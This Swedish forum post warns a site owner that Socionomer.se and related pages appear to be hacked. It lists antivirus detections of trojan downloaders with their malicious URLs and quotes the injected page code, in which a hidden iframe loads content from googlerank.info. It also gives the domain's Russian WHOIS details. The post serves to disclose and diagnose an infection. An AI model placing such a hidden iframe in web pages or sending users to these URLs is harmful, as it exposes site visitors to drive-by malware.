EDIT: Dina övriga sidor verkar också vara infekterade , ex: Socionomer.se
detected: Trojan program Trojan-Downloader.JS.Agent.jy URL:
http://s99.msiesettings.com/check/n404-1.php
detected: Trojan program Trojan-Downloader.VBS.Agent.ck URL:
http://s99.msiesettings.com/check/n404-2.php
detected: malware Exploit.VBS.Phel.bl Script:
http://socionomer.se/[3]
Här ligger en evil iframe på Socionomer . se liksom det gjorde på melta.
Kod:
<link rel="stylesheet" type="text/css" media="screen" title="Default" href="default.css">
<script type="text/javascript" src="system/external.js"></script></head><body onload="javascript:externalLinks();"><iframe src="http://googlerank.info/counter" style="display: none;"></iframe>
googlerank.info har inget med google att göra så vitt jag vet, och ska vara registrerat i ryssland.
Orginal: Jag tror att de fått tillgång till er databas och via den vägen infekterat sidorna.
DLS. Saken är att din sida blev hackad, googlerank.info är registrerad i ryssland.
Registrant Contact Information:
Name: N/A
Organization: N/A
Address 1: N/A
City: N/A
State: Altayskiy kray
Zip: N/A
Country: RU
Phone: +007.0955050505
Email:
[email protected]
De var väl intresserade av att stjäla era kunders uppgifter när de handlar med visakort etc etc.